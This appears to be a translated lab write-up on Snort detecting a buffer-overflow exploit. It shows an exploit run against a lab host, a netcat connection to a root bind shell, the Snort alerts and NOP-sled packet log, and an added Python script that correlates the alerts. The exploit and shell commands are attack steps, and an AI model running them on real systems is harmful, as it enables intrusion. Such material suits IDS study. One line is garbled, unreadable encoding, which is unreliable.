Normal attack (192.168.1.10 → 192.168.1.4)

# ./exp 192.168.1.4 2600











@‚ł́Anetcat‚ŃAƒ^ƒbƒN‚ª¬Œ÷‚µ‚½‚©‚ðŠm”F‚µ‚Ă݂悤B

# nc 192.168.1.4 3879
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

The attack succeeded, and we can confirm that /bin/sh is running on port 3879. Let's also check on the server side with the netstat command.

# netstat -an | grep 3879
tcp        0      0 0.0.0.0:3879            0.0.0.0:*               LISTEN

The attack has now succeeded. Next, we check the Snort logs to see whether the attack was detected. The first entry in the Snort alert log shows this attack detected as "SHELLCODE x86 NOOP". The second alert log entry was generated when we connected to /bin/sh with the netcat command and ran the id command.

Alert

08/17-15:05:56.149304 [**] [1:648:5] SHELLCODE x86 NOOP [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 192.168.1.10:1026 -> 192.168.1.4:2600
08/17-15:09:44.413709 [**] [1:498:3] ATTACK RESPONSES id check returned root [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.1.4:3879 -> 192.168.1.10:1033
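
The pairing of the two alerts described above can be automated. The following is an added example, not part of the original article: it parses Snort fast-alert lines and pairs a SHELLCODE alert with a later ATTACK RESPONSES alert flowing in the opposite direction between the same two hosts. The function names, the 10-minute window, the placeholder year and the third sample line are assumptions made for this example.

```python
import re
from datetime import datetime, timedelta

# Snort "fast" alert: timestamp [**] [gid:sid:rev] msg [**] ... {PROTO} src:port -> dst:port
ALERT_RE = re.compile(
    r"(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s*\[\*\*\]\s*\[\d+:(?P<sid>\d+):\d+\]\s*"
    r"(?P<msg>.*?)\s*\[\*\*\].*?\{\w+\}\s*"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s*->\s*(?P<dst>[\d.]+):(?P<dport>\d+)")

def parse_alert(line):
    m = ALERT_RE.search(line)
    if not m:
        return None
    a = m.groupdict()
    # Fast alerts carry no year; 2000 is an assumed placeholder so deltas can be computed.
    a["ts"] = datetime.strptime("2000/" + a["ts"], "%Y/%m/%d-%H:%M:%S.%f")
    return a

def correlate(lines, window=timedelta(minutes=10)):
    """Pair a SHELLCODE alert (A -> B) with a later ATTACK RESPONSES alert (B -> A)."""
    alerts = [a for a in map(parse_alert, lines) if a]
    hits = []
    for req in (a for a in alerts if a["msg"].startswith("SHELLCODE")):
        for resp in (a for a in alerts if a["msg"].startswith("ATTACK RESPONSES")):
            same_pair = resp["src"] == req["dst"] and resp["dst"] == req["src"]
            if same_pair and timedelta(0) <= resp["ts"] - req["ts"] <= window:
                hits.append({
                    "source": req["src"], "target": req["dst"],
                    "service_port": int(req["dport"]), "response_port": int(resp["sport"]),
                    # A response from a port other than the targeted service suggests a new listener.
                    "new_listener": resp["sport"] != req["dport"],
                    "delay_s": (resp["ts"] - req["ts"]).total_seconds()})
    return hits

SAMPLE = [
    # The two alert lines shown on this page
    "08/17-15:05:56.149304 [**] [1:648:5] SHELLCODE x86 NOOP [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 192.168.1.10:1026 -> 192.168.1.4:2600",
    "08/17-15:09:44.413709 [**] [1:498:3] ATTACK RESPONSES id check returned root [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.1.4:3879 -> 192.168.1.10:1033",
    # Constructed line: same signature between unrelated hosts, must not be paired
    "08/17-15:12:00.000000 [**] [1:498:3] ATTACK RESPONSES id check returned root [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.1.7:22 -> 192.168.1.20:40000",
]

if __name__ == "__main__":
    for hit in correlate(SAMPLE):
        print(hit)
```

Taken separately the two alerts are Priority 1 and Priority 2 events; paired, they show that the host that received the NOP sled later returned root `id` output from a port other than the targeted service.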

Log

[**] SHELLCODE x86 NOOP [**]
08/17-15:15:13.000371 192.168.1.10:1034 -> 192.168.1.4:2600
TCP TTL:64 TOS:0x0 ID:1476 IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0xDC6D5422  Ack: 0xDCEDF57  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 132257 2202797
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90......
(remainder omitted)
